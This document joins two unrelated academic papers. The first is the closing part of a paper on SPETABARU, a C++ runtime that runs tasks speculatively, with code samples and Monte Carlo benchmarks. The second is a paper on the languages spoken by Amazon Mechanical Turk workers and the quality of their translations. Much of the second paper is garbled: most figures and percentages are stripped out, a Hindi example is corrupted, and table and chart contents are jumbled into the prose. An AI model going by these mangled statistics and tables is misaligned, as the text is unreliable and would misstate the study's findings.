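        std::vector<SpeculativeTaskGroup*> predecessors;
        std::vector<SpeculativeTaskGroup*> successors;
    };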
In fact, if an STG is enabled and running, and its uncertain tasks did not modify their data (so that the speculation succeeded), then when a new task is inserted that uses data from this task group and from another one, the two groups should be connected.

Task insertion

In Algorithm 1, we give an overview of the insertion of an uncertain task, and in Algorithm 2 that of a normal task. The algorithms use a list called global_duplicates to save the duplicate data created by the copy tasks inserted before the uncertain tasks. For instance, when a task is inserted, we can look up whether one of its dependencies has been duplicated or not. The difficulty arises from the construction at task insertion time, that is, without hindsight and without knowing what tasks will come next. Therefore, in order to obtain executions as defined in 'Description', we have to determine whether there is a duplicate and whether the related STGs have been disabled or have failed. Also, we need to create duplicates of the data without using them for the current task, which is why we store the duplicate information in separate lists before adding them to global_duplicates once the task has been inserted.

At execution

During the execution, the RS has to decide whether the speculation is enabled or not. It is convenient to do this when the first copy task of an STG becomes ready to be executed. In fact, the decision process can then use information such as the current number of ready tasks in the scheduler. Then, the tasks have to be enabled or disabled accordingly. After any uncertain task has finished, the RS has to enable or disable the tasks related to the STG; it has to iterate over the lists of the STG and, potentially, of its successors. The DAG remains unchanged, and so any RS that provides callbacks and activation/deactivation features can implement our mechanism.

Implementation (SPETABARU)

We have implemented our speculation method on top of a lightweight C++ RS of only a few thousand lines. The project is open source and available at https://gitlab.inria.fr/bramas/spetabaru. We use modern C++ and advanced meta-programming to analyze the data dependencies at compile time. The RS supports the data access modes read, write, atomic_write, and commute (for commutative operations). We also use a dynamic array view, which makes it possible to have an unlimited number of dependencies known only at execution time. It is possible to use lambda/anonymous functions as tasks, as shown in Code 1.

    // Create the runtime
    const int numThreads = SpUtils::DefaultNumThreads();
    SpRuntime runtime(numThreads);

    const int initVal = 1;   // example values
    int writeVal = 0;

    // Create a task with a lambda function
    runtime.task(SpRead(initVal), SpWrite(writeVal),
                 [](const int& initValParam, int& writeValParam){
                     writeValParam += initValParam;
                 });

    // Create a task with a lambda function (that returns a bool)
    auto returnValue = runtime.task(SpRead(initVal), SpWrite(writeVal),
                 [](const int& initValParam, int& writeValParam) -> bool {
                     writeValParam += initValParam;
                     return true;
                 });

    // Wait for the completion of a single task
    returnValue.wait();
    // Get the value of the task
    const bool res = returnValue.getValue();
    // Wait until two tasks (or fewer) remain
    runtime.waitRemain(2);
    // Wait for all tasks to be done
    runtime.waitAllTasks();
    // Save the trace and the .dot file
    runtime.generateTrace("/tmp/basis-trace.svg");
    runtime.generateDot("/tmp/basis-dag.dot");

Code 1: SPETABARU example.
The example of an uncertain task is given in Code 2. Compared to a regular task, the keyword SpMaybeWrite replaces SpWrite, and the function returns a boolean to inform the RS whether a modification occurred.

    runtime.potentialTask(SpMaybeWrite(val),
                          [](int& /*valParam*/) -> bool {
                              return false; // val has not been modified
                          });

Code 2: Example of creating an uncertain task in SPETABARU.

The current publication includes, as supplementary material, the bash script used to execute the simulations and to post-process the results, in addition to the full output of the executions.

Execution example

We show two examples and their execution results in the figures below. The description of the inserted tasks is given in panels (a); these descriptions also indicate the result of each uncertain task, known only at the end of its execution, where true means that the task wrote its data and false that it did not. The DAGs without speculation are given in panels (b), and the DAGs with speculation in panels (c).

Figure: Execution example with four tasks. B and C are uncertain tasks; here B did not write its data, while C did. Consequently, the RS disabled or enabled the other tasks accordingly. (a) Description of the tasks: A writes val; B (uncertain) maybe-writes val and returns false; C (uncertain) maybe-writes val and returns true; D writes val. (b) DAG without speculation. (c) DAG with speculation, including the sp-copy tasks, the speculative tasks C' and D', and the disabled tasks and sp-selects.

Figure: Execution example with seven tasks. B, C, D, and E are uncertain tasks; here B did not write its data, while C, D, and E did. Consequently, the RS disabled or enabled the other tasks accordingly. (a) Description of the tasks: A writes val1, val2, and val3; B, C, D, and E (uncertain) each maybe-write one of these values, with B returning false and C, D, and E returning true; F writes val1, val2, and val3. (b) DAG without speculation. (c) DAG with speculation.

In panel (c) of the first example, after B is executed the RS knows that B did not change any data; therefore it disables C and enables the merge. However, once C' is complete, the RS knows that it wrote its data. Consequently, the RS must enable D and disable the merge. It also tried to disable D', but the result visible in the DAG indicates that this happened too late. In panel (c) of the second example, a more complex execution happened. Since B did not write its data, C has been disabled and the corresponding select has been enabled. However, since D and E did write their data, F and G have been enabled, and the two last selects have been disabled.

Performance study

Configuration

Software/hardware. We used a multi-socket Intel Xeon (E5 series) machine. We compiled with the GNU compiler and bound the threads to the cores following a compact strategy, i.e., the threads are pinned to contiguous cores. We used SPETABARU from the public master branch, at the tagged version used for this study.
Test case

We evaluated our approach on an MC simulation composed of five domains, each containing the same number of particles, executed for an increasing number of iterations. We computed the Lennard-Jones potential between the particles to obtain the global energy. The moves (particle updates) are a simple random redistribution of the particles in the simulation box. For the REMC, we used five replicas and performed a replica exchange every three iterations; we also measured the reject/accept ratio of the moves and the exchange rate between replicas. Execution times are obtained by averaging over multiple runs. The deviation is not given in the results because it is very limited: the kernels are highly compute-intensive with limited memory transfers, and many threads remain idle for a significant amount of time during the execution, which limits contention effects.

MC

We compared three approaches:
• Task-based: we used the task-based execution as the baseline. However, since there is no degree of parallelism between the iterations of the loop, it is equivalent to a sequential execution.
• Speculative Spec(T,S): here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. The speculation is always enabled.
• Reject Rej(T): here, T represents the number of threads. In this configuration, we look at the performance when all changes are rejected, to provide a reference for the possible speedup if all speculations were successful. This is not a realistic execution for an MC simulation, because it would mean that all moves are rejected. The speculation is always enabled.

The tasks are created such that each one represents one iteration of the inner loop of the MC algorithm: a task includes the move, the computation of the energy, and the acceptance test for a single domain. Consequently, each task accesses the energy matrix and one of the domains in maybe-write mode, and all the other domains in read mode.
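To make the task structure concrete, the following schematic sketch inserts one such iteration per domain using the uncertain-task interface shown in Code 2. It assumes the SPETABARU headers are available; the Domain and EnergyMatrix types, the kernels, and the exact potentialTask signature (the read accesses to the other domains are omitted here) are illustrative placeholders rather than the code used in the experiments:

    #include <cstddef>
    #include <vector>

    struct Domain { /* particle positions */ };
    struct EnergyMatrix { /* pairwise Lennard-Jones contributions */ };

    // One MC iteration: one uncertain task per domain. Each task proposes a move,
    // recomputes the energy, applies the acceptance test, and tells the RS whether
    // the domain/energy were actually modified.
    void insertMcIteration(SpRuntime& runtime, std::vector<Domain>& domains,
                           EnergyMatrix& energy) {
        for (std::size_t d = 0; d < domains.size(); ++d) {
            runtime.potentialTask(SpMaybeWrite(domains[d]), SpMaybeWrite(energy),
                [](Domain& dom, EnergyMatrix& /*en*/) -> bool {
                    Domain proposal = dom;   // move: random particle update (placeholder)
                    bool accepted = false;   // Metropolis accept/reject test (placeholder)
                    // ... recompute the energy contributions of the proposal ...
                    if (accepted) {
                        dom = proposal;      // commit the move and update the energy matrix
                    }
                    return accepted;         // false: data unchanged, the speculation can be kept
                });
        }
    }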
Figure: Execution traces of the MC simulation for different configurations. One iteration is computed in (a), (b), and (c); two iterations are computed in (d) and (e). Legend: initial energy computation, move and energy recomputation, and speculative move and energy recomputation.

This figure shows the execution traces for computing one or two iterations, where each of the five domains is moved once per iteration. Panel (a) simply gives the baseline with a task-based execution; since there is no parallelism, we obtain a sequential execution on multiple cores. In panel (b), we see that a normal move/computation task is executed together with four speculative tasks. We can see that the first move was rejected but not the second one; therefore, the process continued by computing the last three moves normally. In panel (c), we see what the execution would look like if all the moves were rejected: in that case, all speculations would be correct and only one normal task would be computed. In panel (d), we compute two iterations, but the 2 × 5 uncertain move/computation tasks were inserted consecutively. Consequently, as the second move is rejected, the following eight moves/computations have to be computed normally. To avoid this large penalty, we can reduce the number of consecutive tasks we insert, as shown in panel (e). Here, we restart a new speculative process at each iteration, which limits the degree of parallelism to five (the number of domains) but avoids canceling a complete set of speculative tasks. This means that, in the code, we manually insert a normal task instead of what could have been an uncertain task, to ensure that a speculation process is restarted afterward.

The MC performance figure (further below) provides the performance results for the MC simulation. We look at the gain obtained by using speculation, but also at the effect of the speculation degree. We see that as the number of iterations increases, the speedup stabilizes at a level above the theoretical result for the corresponding probability given in the gain/speedup table, and the upper bound Rej gets closer to five.

REMC

We compared three approaches:
• Task-based: since there is no degree of parallelism inside the MC, the maximum parallelism is obtained through the concurrency between replicas.
• Speculative Spec(T,S): here, T represents the number of threads and S the number of consecutive uncertain tasks inserted before inserting a normal task. The speculation is always enabled.
• Reject Rej(T): here, T represents the number of threads. In this configuration, we look at the performance when all changes are rejected, to provide a reference for the possible speedup if all speculations were successful. This is not a realistic execution for an MC simulation. The speculation is always enabled.

Since using speculation creates more work and more tasks to compute, enabling the speculation in all cases can lead to an overhead; this is visible in the REMC execution-time results for the configuration with the fewest threads. Using more threads, however, yields better performance. In terms of speedup, increasing the number of consecutive speculative tasks does not improve the performance: a smaller S is always faster, because the speculation succeeds with a limited probability. Of course, having more threads also increases the performance of the all-reject configuration Rej; more precisely, the more threads we have, the faster it executes.

Conclusion

In the current paper, we provided the first results on the use of speculation in task-based RSs. We described a general pattern and the algorithm of a predictive-oriented approach. Our RS, SPETABARU, is able to execute speculative task flows, and we demonstrated that the speedup obtained for both the MC and REMC simulations is close to the theoretical one for the corresponding acceptance probability.
The mechanism we proposed can easily be incorporated into any other runtime system. However, the fact that we used the C++ language is an important asset, because it makes it possible to generate the functions capable of copying (and selecting) the user's data. Implementing our system in a lower-level language would require more advanced programming from the user's perspective, such as function pointers. The number of speculation failures can reduce the benefits and, in the worst case, lead to underperformance when the runtime generates too many tasks for the available CPU cores.

Figure: Performance of the MC simulation with five domains. (a) Execution time; (b) speedup over the task-based executions, for the Task-based, Spec(T,S), and Rej(T) configurations as a function of the number of iterations.

Figure: Performance of the REMC simulation with five replicas and five domains per replica. (a) Execution time; (b) speedup over the task-based executions.
In addition, our system uses duplication of data, such that memory limits could be reached if it is not used carefully. For these reasons, as perspectives, we would like to address three major points. First, we would like to automatically limit the degree of speculation (the number of consecutive uncertain tasks). Second, we would like to implement the eager approach, to speculate again after a failure inside an STG and obtain a better speedup for the MC/REMC simulations. Finally, we would like to study the speculation/decision formula: the resulting process should take into account the number of ready tasks as well as the number of threads, and certainly use a historical model of previous executions to predict cleverly whether enabling the speculation is appropriate. This would remove the possible overhead of speculation when there is no need to increase the degree of parallelism at some points of the execution.

Acknowledgements

Work by Bérenger Bramas was partially done at the Max Planck Computing and Data Facility (MPCDF), Garching, Germany. Experiments presented in this paper were carried out using the PlaFRIM experimental testbed, supported by Inria, CNRS (LaBRI and IMB), Université de Bordeaux, Bordeaux INP, and Conseil Régional d'Aquitaine.

Additional Information and Declarations

Funding: The authors received no funding for this work.

Competing Interests: The authors declare there are no competing interests.

Author Contributions: Bérenger Bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability: The following information was supplied regarding data availability: data is available at GitLab: https://gitlab.inria.fr/bramas/spetabaru.

Supplemental Information: Supplemental information for this article can be found online alongside the published article.
The Language Demographics of Amazon Mechanical Turk

Ellie Pavlick, Matt Post, Ann Irvine, Dmitry Kachaev, Chris Callison-Burch
Computer and Information Science Department, University of Pennsylvania
Human Language Technology Center of Excellence, Johns Hopkins University

Abstract

We present a large-scale study of the languages spoken by bilingual workers on Mechanical Turk (MTurk). We establish a methodology for determining the language skills of anonymous crowd workers that is more robust than simple surveying. We validate workers' self-reported language skill claims by measuring their ability to correctly translate words, and by geolocating workers to see if they reside in countries where the languages are likely to be spoken. Rather than posting a one-off survey, we posted a large number of paid translation assignments covering a fixed set of words in each of the languages studied. Our study ran for several months and was highly visible on the MTurk crowdsourcing platform, increasing the chances that bilingual workers would complete it. Our study was useful both to create bilingual dictionaries and to act as a census of the bilingual speakers on MTurk. We use this data to recommend the languages with the largest speaker populations as good candidates for other researchers who want to develop crowdsourced, multilingual technologies. To further demonstrate the value of creating data via crowdsourcing, we hire workers to create bilingual parallel corpora in six Indian languages and use them to train statistical machine translation systems.

Overview

Crowdsourcing is a promising new mechanism for collecting data for natural language processing research. Access to a fast, cheap, and flexible workforce allows us to collect new types of data, potentially enabling new language technologies. Because crowdsourcing platforms like Amazon Mechanical Turk (MTurk) give researchers access to a worldwide workforce, one obvious application of crowdsourcing is the creation of multilingual technologies. With an increasing number of active crowd workers located outside of the United States, there is even the potential to reach fluent speakers of lower-resource languages. In this paper, we investigate the feasibility of hiring language informants on MTurk by conducting the first large-scale demographic study of the languages spoken by workers on the platform.

There are several complicating factors when trying to take a census of workers on MTurk. The workers' identities are anonymized, and Amazon provides no information about their countries of origin or their language abilities. Posting a simple survey to have workers report this information may be inadequate, since (a) many workers may never see the survey, (b) many opt not to do one-off surveys since the potential payment is low, and (c) validating the answers of respondents is not straightforward.

Our study establishes a methodology for determining the language demographics of anonymous crowd workers that is more robust than simple surveying. We ask workers what languages they speak and what country they live in, and validate their claims by measuring their ability to correctly translate words and by recording their geolocation. To increase the visibility and desirability of our tasks, we posted a large number of assignments in each language. These tasks each consist of translating foreign words into English.
Two of the words in each task have known translations, allowing us to validate that the workers' translations are accurate. We construct large bilingual dictionaries, with the majority of the entries being new. Surveying thousands of workers allows us to analyze the current speaker populations for the languages studied.

Figure: The number of workers per country. This map was generated by geolocating the IP addresses of the workers in our study. Omitted are workers who were located in more than one country during the study and workers who could not be geolocated. The size of the circles represents the number of workers from each country; the two largest are India and the United States, followed by countries such as the Philippines, Egypt, Russia, and Sri Lanka.

The data also allows us to answer questions like: How quickly is work completed in a given language? Are crowdsourced translations reliably good? How often do workers misrepresent their language abilities to obtain financial rewards?

Background and Related Work

Amazon's Mechanical Turk (MTurk) is an online marketplace for work that gives employers and researchers access to a large, low-cost workforce. MTurk allows employers to provide micropayments in return for workers completing microtasks. The basic units of work on MTurk are called 'Human Intelligence Tasks' (HITs). MTurk was designed to accommodate tasks that are difficult for computers but simple for people. This facilitates research into human computation, where people can be treated as a function call (von Ahn; Little et al.; Quinn and Bederson). It has applications to research areas like human-computer interaction (Bigham et al.; Bernstein et al.), computer vision (Sorokin and Forsyth; Deng et al.; Rashtchian et al.), speech processing (Marge et al.; Lane et al.; Parent and Eskenazi; Eskenazi et al.), and natural language processing (Snow et al.; Callison-Burch and Dredze; Laws et al.).

On MTurk, researchers who need work completed are called 'requesters', and workers are often referred to as 'Turkers'. MTurk is a true market, meaning that Turkers are free to choose the HITs that interest them, and requesters can price their tasks competitively to try to attract workers and have their tasks done quickly (Faridani et al.; Singer and Mittal). Turkers remain anonymous to requesters, and all payment occurs through Amazon. Requesters are able to accept submitted work or to reject work that does not meet their standards; Turkers are only paid if a requester accepts their work.

Several reports examine Mechanical Turk as an economic market (Ipeirotis; Lehdonvirta and Ernkvist). When Amazon introduced MTurk, it first offered payment only in Amazon credits, and later offered direct payment in US dollars. More recently, it has expanded to include one foreign currency, the Indian rupee. Despite its payments being limited to two currencies or Amazon credits, MTurk claims over half a million workers from a large number of countries (Amazon). This suggests that its worker population should represent a diverse set of languages.
A demographic study by Ipeirotis focused on age, gender, marital status, income levels, motivation for working on MTurk, and whether workers used it as a primary or supplemental form of income; the study contrasted Indian and US workers. Ross et al. completed a longitudinal follow-on study. A number of other studies have informally investigated Turkers' language abilities. Munro and Tily compiled survey responses from Turkers, revealing that four of the six most represented languages come from India (the top six being Hindi, Malayalam, Tamil, Spanish, French, and Telugu). Irvine and Klementiev had Turkers evaluate the accuracy of translations that had been automatically induced from monolingual texts. They examined translations of words in low-resource languages and reported the geolocated countries of their workers (India, the US, Romania, Pakistan, Macedonia, Latvia, Bangladesh, and the Philippines). Irvine and Klementiev discussed the difficulty of quality control and of assessing the plausibility of workers' language skills for rare languages, which we address in this paper.

Several researchers have investigated using MTurk to build bilingual parallel corpora for machine translation, a task which stands to benefit from low-cost, high-volume translation on demand (Germann). Ambati et al. conducted a pilot study by posting sentences to MTurk for Spanish, Chinese, Hindi, Telugu, Urdu, and Haitian Creole. In a study of Urdu sentences, Zaidan and Callison-Burch presented methods for achieving professional-level translation quality from Turkers by soliciting multiple English translations of each foreign sentence. Zbib et al. used crowdsourcing to construct a parallel corpus of over a million words of dialectal Arabic and English, training a statistical machine translation system that produced higher-quality translations of dialectal Arabic than a system trained on many times more Modern Standard Arabic-English parallel data. Zbib et al. also conducted a systematic study showing that training an MT system on crowdsourced translations resulted in the same performance as training on professional translations, at a fraction of the cost. Hu et al. performed crowdsourced translation by having monolingual speakers collaborate and iteratively improve MT output.

Table: Self-reported native languages of the bilingual Turkers in our study. Languages with only a few self-reported speakers are grouped or omitted, as are Turkers who did not report a native language or who reported multiple native languages. The most common self-reported native languages were English, Tamil, Malayalam, Hindi, Spanish, Telugu, Chinese, Romanian, Portuguese, Arabic, Kannada, German, French, Polish, Urdu, Tagalog, Marathi, Russian, Italian, Bengali, Gujarati, Hebrew, Dutch, Turkish, Vietnamese, Macedonian, Cebuano, Swedish, Bulgarian, Swahili, Hungarian, Catalan, Thai, Lithuanian, and Punjabi.

Several researchers have examined cost optimization using active learning techniques to select the most useful sentences or fragments to translate (Ambati and Vogel; Bloodgood and Callison-Burch; Ambati).

To contrast our research with previous work, the main contributions of this paper are: (1) a robust methodology for assessing the bilingual skills of anonymous workers, (2) the largest-scale census to date of the language skills of workers on MTurk, and (3) a detailed analysis of the data gathered in our study.

Experimental Design

The central task in this study was to investigate Mechanical Turk's bilingual population.
We accomplished this through self-reported surveys combined with a HIT to translate individual words in each of the languages studied. We evaluate the accuracy of the workers' translations against known translations. In cases where these were not exact matches, we used a second-pass monolingual HIT, which asked English speakers to evaluate whether a worker-provided translation was a synonym of the known translation.

Demographic questionnaire. At the start of each HIT, Turkers were asked to complete a brief survey about their language abilities. The survey asked the following questions:
• Is [language] your native language?
• How many years have you spoken [language]?
• Is English your native language?
• How many years have you spoken English?
• What country do you live in?
We also automatically collected each worker's current location by geolocating their IP address. Thousands of unique workers completed our HITs; we recorded the survey answers they provided and geolocated those whose IP addresses could be resolved. The map figure above plots the locations of the workers across countries, and the native-language table gives the most common self-reported native languages.

Selection of languages. We drew our data from the different language versions of Wikipedia, selecting the languages with the largest numbers of articles (see the language table below). For each language, we chose the most viewed articles over a one-year period and extracted the most frequent words from them. The resulting vocabularies served as the input to our translation HIT.

Translation HIT. For the translation task, we asked Turkers to translate individual words. We showed each word in the context of three sentences drawn from Wikipedia. Turkers were allowed to mark that they were unable to translate a word. Each task contained a set of words, all but two of which had unknown translations; the remaining two were quality-control words with known translations. We gave special instructions for translating names of people and places, giving examples of how to handle 'Barack Obama' and 'Australia' using their interlanguage links; for languages with non-Latin alphabets, names were transliterated. The task paid a fixed micropayment per assignment, and each set of words was independently translated by three separate workers. In total, our workers completed translation assignments comprising more than a million words over a period of three and a half months.
Gold-standard translations. A set of gold-standard translations was automatically harvested from Wikipedia for every language, to use as embedded controls. The language list and the page-view statistics were taken from http://meta.wikimedia.org/wiki/list_of_wikipedias and http://dumps.wikimedia.org/other/pagecounts-raw/ . We used Wikipedia's interlanguage links to pair the titles of English articles with the titles of the corresponding foreign articles. To get a more translatable set of pairs, we excluded any pair where: (1) the English word was not present in the WordNet ontology (Miller), (2) either article title was longer than a single word, (3) the English Wikipedia page was a subcategory of Person or Place, or (4) the English and foreign titles were identical or one was a substring of the other.

Table: The languages used in our study, grouped by the number of Wikipedia articles in each language; each language's code is given in parentheses. These language codes are used in other figures throughout this paper.
Largest Wikipedias: German (de), English (en), Spanish (es), French (fr), Italian (it), Japanese (ja), Dutch (nl), Polish (pl), Portuguese (pt), Russian (ru).
Second group: Arabic (ar), Bulgarian (bg), Catalan (ca), Czech (cs), Danish (da), Esperanto (eo), Basque (eu), Persian (fa), Finnish (fi), Hebrew (he), Hindi (hi), Croatian (hr), Hungarian (hu), Indonesian (id), Korean (ko), Lithuanian (lt), Malay (ms), Norwegian (Bokmal) (no), Romanian (ro), Slovak (sk), Slovenian (sl), Serbian (sr), Swedish (sv), Turkish (tr), Ukrainian (uk), Vietnamese (vi), Waray-Waray (war), Chinese (zh).
Third group: Afrikaans (af), Amharic (am), Asturian (ast), Azerbaijani (az), Belarusian (be), Bengali (bn), Bishnupriya Manipuri (bpy), Breton (br), Bosnian (bs), Cebuano (ceb), Welsh (cy), Zazaki (diq), Greek (el), West Frisian (fy), Irish (ga), Galician (gl), Gujarati (gu), Haitian (ht), Armenian (hy), Icelandic (is), Javanese (jv), Georgian (ka), Kannada (kn), Kurdish (ku), Luxembourgish (lb), Latvian (lv), Malagasy (mg), Macedonian (mk), Malayalam (ml), Marathi (mr), Neapolitan (nap), Low Saxon (nds), Nepali (ne), Newar / Nepal Bhasa (new), Norwegian (Nynorsk) (nn), Piedmontese (pms), Sicilian (scn), Serbo-Croatian (sh), Albanian (sq), Sundanese (su), Swahili (sw), Tamil (ta), Telugu (te), Thai (th), Tagalog (tl), Urdu (ur), Yoruba (yo).
Smallest group: Central Bicolano (bcl), Tibetan (bo), Ilokano (ilo), Punjabi (pa), Kapampangan (pam), Pashto (ps), Sindhi (sd), Somali (so), Uzbek (uz), Wolof (wo).

Manual evaluation of non-identical translations. We counted all translations that exactly matched the gold-standard translation as correct. For non-exact matches, we created a second-pass quality-assurance HIT. Turkers were shown a pair of English words, one of which was a Turker's translation of the foreign control word and the other the gold-standard translation of that word. Evaluators were asked whether the two words had the same meaning, choosing between three answers: 'yes', 'no', or 'related but not synonymous'.
three separate turkers judged each pair, allowing majority votes for diffi- cult cases. we checked turkers who were working on this task by embedding pairs of words which were ei- पा क$ %तान ( भी + त$ कार %व.प २८ मई १९९८ छह परमाण परी:ण कर डा<। in retribution pakistan also did six nuclear tests on may . on may pakistan also conducted six nuclear tests as an act of redressal. retaliating on this ’pakistan’ conducted six( ) nuclear tests on may, . pakistan also did nuclear test in retribution on may, figure : an example of the turkers’ translations of a hindi sentence. the translations are unedited and contain fixable spelling, capitalization and grammat- ical errors. ther known to be synonyms (drawn from word- net) or unrelated (randomly chosen from a corpus). automating approval/rejections for the second-pass evaluation allowed the whole pipeline to be run au- tomatically. caching judgments meant that we ulti- mately needed only , synonym tasks to judge all of the submitted translations (a total of , non-matching word pairs). these were completed by an additional , workers. each of these as- signments included word pairs and paid $ . . full sentence translations to demonstrate the feasibility of using crowdsourcing to create multi- lingual technologies, we hire turkers to construct bilingual parallel corpora from scratch for six in- dian languages. germann ( ) attempted to build a tamil-english translation system from scratch by hiring professional translators, but found the cost prohibitive. we created parallel corpora by trans- lating the most viewed wikipedia pages in ben- gali, malyalam, hindi, tamil, telugu, and urdu into english. we collected four translations from differ- ent turkers for each source sentence. workers were paid $ . per hit to translate sentences. we accepted or rejected translations based on a manual review of each worker’s submis- sions, which included a comparison of the transla- tions to a monotonic gloss (produced with a dic- tionary), and metadata such as the amount of time the worker took to complete the hit and their geo- graphic location. figure shows an example of the translations we obtained. the lack of a professionally translated reference sentences prevented us from doing a sys- tematic comparison between the quality of profes- p t b s sh t l it sr ro e s m s d e a f te h r id d a n l tr g u sk fi h e m l fr ja p a b g m k n o g l h t g a sv c y lv h u k n a z b e lt k o n e e o a r p l m r c a c s sw t a h i b n n n k a so z h jv e l c e b v i b c l is su u z lb b p y sc n n e w u r sd b r p s ru a m w o b o . . . . . . figure : translation quality for languages with at least turkers. the dark blue bars indicate the pro- portion of translations which exactly matched gold standard translations, and light blue indicate translations which were judged to be correct synonyms. error bars show the % confidence intervals for each language. sion and non-professional translations as zaidan and callison-burch ( ) did. instead we evaluate the quality of the data by using it to train smt systems. we present results in section . measuring translation quality for single word translations, we calculate the qual- ity of translations on the level of individual assign- ments and aggregated over workers and languages. we define an assignment’s quality as the proportion of controls that are correct in a given assignment, where correct means exactly correct or judged to be synonymous. 
quality(ai) = ki ki∑ j= δ(trij ∈ syns[gj]) ( ) where ai is the ith assignment, ki is the number of controls in ai, trij is the turker’s provided transla- tion of control word j in assignment i, gj is the gold standard translation of control word j, syns[gj] is the set of words judged to be synonymous with gj and includes gj, and δ(x) is kronecker’s delta and takes value when x is true. most assignments had two known words embedded, so most assignments had scores of either , . , or . since computing overall quality for a language as the average assignment quality score is biased to- wards a small number of highly active turkers, we instead report language quality scores as the aver- age per-turker quality, where a turker’s quality is the average quality of all the assignments that she completed: quality(ti) = ∑ aj∈assigns[i] quality(aj) | assigns[i] | ( ) where assigns[i] is the assignments completed by turker i, and quality(a) is as above. quality for a language is then given by quality(li) = ∑ tj∈turkers[i] quality(tj) | turkers[i] | ( ) when a turker completed assignments in more than one language, their quality was computed separately for each language. figure shows the transla- tion quality for languages with contributions from at least workers. cheating using machine translation one obvi- ous way for workers to cheat is to use available online translation tools. although we followed best practices to deter copying-and-pasting into on- line mt systems by rendering words and sentences as images (zaidan and callison-burch, ), this strategy does not prevent workers from typing the words into an mt system if they are able to type in the language’s script. to identify and remove workers who appeared to be cheating by using google translate, we calcu- lated each worker’s overlap with the google transla- tions. we used google to translate all , words for the foreign languages that google trans- late covered at the time of the study. we mea- sured the percent of workers’ translations that ex- actly matched the translation returned from google. figure a shows overlap between turkers’s trans- lations and google translate. when overlap is high, it seems likely that those turkers are cheating. it is also reasonable to assume that honest workers will overlap with google some amount of the time as google’s translations are usually accurate. we di- vide the workers into three groups: those with very high overlap with google (likely cheating by using google to translate words), those with reasonable overlap, and those with no overlap (likely cheating by other means, for instance, by submitting random text). our gold-standard controls are designed to iden- tify workers that fall into the third group (those who are spamming or providing useless translations), but they will not effectively flag workers who are cheat- ing with google translate. we therefore remove the turkers with the highest overlap with google. this equates to removing all workers with greater than % overlap. figure b shows that removing workers at or above the % threshold retains % of the collected translations and over % of the workers. quality scores reported throughout the paper re- flect only translations from turkers whose overlap with google falls below this % threshold. data analysis we performed an analysis of our data to address the following questions: • do workers accurately represent their language abilities? should we constrain tasks by region? • how quickly can we expect work to be com- pleted in a particular language? 
(a) individual workers’ overlap with google translate. we removed the workers with the highest overlap (shaded region on the left) from our analyses, as it is rea- sonable to assume these workers are cheating by submit- ting translations from google. workers with no overlap (shaded region on the right) are also likely to be cheating, e.g. by submitting random text. (b) cumulative distribution of overlap with google trans- late for workers and translations. we see that eliminating all workers with > % overlap with google translate still preserves % of translations and > % of workers. figure • can turkers’ translations be used to train mt systems? • do our dictionaries improve mt quality? language skills and location we measured the average quality of workers who were in countries that plausibly speak a language, versus workers from countries that did not have large speaker populations of that language. we used the ethnologue (lewis avg. turker quality (# ts) primary locations primary locations in region out of region of turkers in region of turkers out of region hindi . ( ) . ( ) india ( ) uae ( ) uk ( ) saudi arabia ( ) russia ( ) oman ( ) tamil . ( ) ** . ( ) india ( ) us ( ) canada ( ) tunisia ( ) egypt ( ) malayalam . ( ) . ( ) india ( ) uae ( ) us ( ) saudi arabia ( ) maldives ( ) spanish . ( ) . ( ) us ( ) mexico ( ) spain ( ) india ( ) new zealand ( ) brazil ( ) french . ( ) . ( ) india ( ) us ( ) france ( ) greece ( ) netherlands ( ) japan ( ) chinese . ( ) . ( ) us ( ) singapore ( ) china ( ) hong kong ( ) australia ( ) germany ( ) german . ( ) . ( ) germany ( ) us ( ) austria ( ) india ( ) netherlands ( ) greece ( ) italian . ( ) * . ( ) italy ( ) us ( ) romania ( ) india ( ) ireland ( ) spain ( ) amharic . ( ) ** . ( ) us ( ) ethiopia ( ) india ( ) georgia ( ) macedonia ( ) kannada . ( ) na ( ) india ( ) arabic . ( ) ** . ( ) egypt ( ) jordan ( ) morocco ( ) us ( ) india ( ) canada ( ) sindhi . ( ) . ( ) india ( ) pakistan ( ) us ( ) macedonia ( ) georgia ( ) indonesia ( ) portuguese . ( ) . ( ) brazil ( ) portugal ( ) us ( ) romania ( ) japan ( ) israel ( ) turkish . ( ) . ( ) turkey ( ) us ( ) macedonia ( ) india ( ) pakistan ( ) taiwan ( ) telugu . ( ) . ( ) india ( ) us ( ) uae ( ) saudi arabia ( ) irish . ( ) . ( ) us ( ) ireland ( ) uk ( ) india ( ) romania ( ) macedonia ( ) swedish . ( ) . ( ) us ( ) sweden ( ) finland ( ) india ( ) macedonia ( ) croatia ( ) czech . ( ) * . ( ) us ( ) czech republic ( ) serbia ( ) macedonia ( ) india ( ) uk ( ) russian . ( ) * . ( ) us ( ) moldova ( ) russia ( ) india ( ) macedonia ( ) uk ( ) breton . ( ) . ( ) us ( ) india ( ) macedonia ( ) china ( ) table : translation quality when partitioning the translations into two groups, one containing translations submitted by turkers whose location is within regions that plausibly speak the foreign language, and the other containing translations from turkers outside those regions. in general, in-region turkers provide higher quality translations. (**) indicates differences significant at p= . , (*) at p= . . et al., ) to compile the list of countries where each language is spoken. table compares the av- erage translation quality of assignments completed within the region of each language, and compares it to the quality of assignments completed outside that region. our workers reported speaking languages na- tively. us workers alone reported native lan- guages. 
overall, , workers were located in a region likely to speak the language from which they were translating, and , workers were located in countries considered out of region (meaning that about a third of our , turkers completed hits in multiple languages). table shows the differences in translation qual- ity when computed using in-region versus out-of- region turkers, for the languages with the greatest number of workers. within region workers typi- cally produced higher quality translations. given the number of indian workers on mechanical turk, it is unsurprising that they represent majority of out- of-region workers. for the languages that had more than out of region workers (malay, amharic, ice- landic, sicilian, wolof, and breton), indian workers represented at least % of the out of region workers in each language. a few languages stand out for having suspiciously strong performance by out of region workers, no- tably irish and swedish, for which out of region workers account for a near equivalent volume and quality of translations to the in region workers. this is admittedly implausible, considering the relatively small number of irish speakers worldwide, and the very low number living in the countries in which our turkers were based (primarily india). such results highlight the fact that cheating using online transla- tion resources is a real problem, and despite our best efforts to remove workers using google translate, some cheating is still evident. restricting to within region workers is an effective way to reduce the prevalence of cheating. we discuss the languages which are best supported by true native speakers in section . speed of translation figure gives the comple- tion times for languages. the languages to finish in the shortest amount of time were: tamil, malayalam, telugu, hindi, macedonian, spanish, serbian, romanian, gujarati, and marathi. seven of the ten fastest languages are from india, which is un- , , , , , , , , m al ay al am ta m il tel ugu hindi urd u ben 